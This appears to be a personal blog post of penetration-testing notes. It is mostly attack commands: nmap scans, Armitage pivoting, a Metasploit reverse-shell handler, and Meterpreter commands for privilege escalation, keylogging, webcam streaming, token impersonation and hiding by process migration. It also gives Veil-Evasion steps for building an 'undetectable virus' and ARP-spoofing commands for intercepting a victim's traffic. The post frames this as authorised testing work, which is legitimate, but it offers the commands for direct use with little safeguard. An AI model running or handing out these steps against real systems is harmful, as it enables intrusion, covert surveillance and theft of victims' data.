A while back I was tasked with some penetration testing. I plan to put a collection of what I did here.

I use Kali Linux for my testing.

nmap

Here is an example of a command to scan for any open ports on network 192.168.1.0

nmap -v -p 1-65535 -sV -O -sS -T4 -oX (path-to-xml.xml) 192.168.1.0/16

More nmap examples can be found here

Armitage

open up the listener like so:

  • Armitage>Listeners>Reverse (wait for)
  • enter the port you used in your exploit (virus)
  • type is meterpreter
  • The listener is now running

Once machine is compromised it will display lightning bolts on the machine. Here are helpful things to do in Armitage:

  • Right click compromised machine select Meterpreter X>Access>Pass Session – this will create another session do this in case the one you are in crashes so you have a backup
  • Select Meterpreter X>Pivoting>Setup – click the network you want and select add pivot – This will setup a pivot point to attack machines accessible by the compromised machine

Meterpreter Shell

getsystem – attempts to elevate your privilege to that of local system

webcam_stream – Play a video stream from webcam

webcam_list – list webcams

keyscan_start – log keystrokes (be sure to open another Meterpreter session before doing this as it may crash the current one)

keyscan_stop – stops logging keystrokes

use incognito – loads modules for token impersination ect.

list_tokens – list token available (use incognito must be loaded)

impersonate_token archq\\administartor – impersinate specifed token (use incognito must be loaded)

getuid – shows current user session is running as

getsid – get the sid of the user process is running as

ps – list processess

migrate PID – Migrate to certain process. this helps hide your program

shell – drops you into cmd.exe for windows on that machine

Msfconsole Commands

msfupdate updates the framework

To setup a reverse shell:

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST IP Address

set LPORT 4444

exploit

Veil-evasion

Use this to create your own undetectable virus (Unknown how well it hides now it has been several years since I tested)

You will want to setup a meterpreter listener that this virus will connect to

list

use 35 (or python/shellcode_inject/aes_encrypt

configure the information then type:

generate

use the file outputted on machine you want to compromise

Man in the Middle Attack

Enable IP Forward like so:

echo 1 >> /proc/sys/net/ipv4/ip_forward

Now to setup the ARP spoof:

arpspoof -i eth0 -t [IP Address of Victim] [Router IP Address]

Then do the opposite way:

arpspoof -i eth0 -t [Router IP Address] [IP Address of Victim]

You can then do wireshark to capture their traffic or run the following command to see the pages they visit:

driftnet -i eth0

Once that is working you can then sniff traffic to and from that machine using:

driftnet -i eth0

wireshark

urlsnarf -i eth0

Enable Auto Login as Root

leafpad /etc/gdm3/daemon.conf

uncomment the lines:
[daemon]
# Enabling automatic login
  AutomaticLoginEnable = true
  AutomaticLogin = root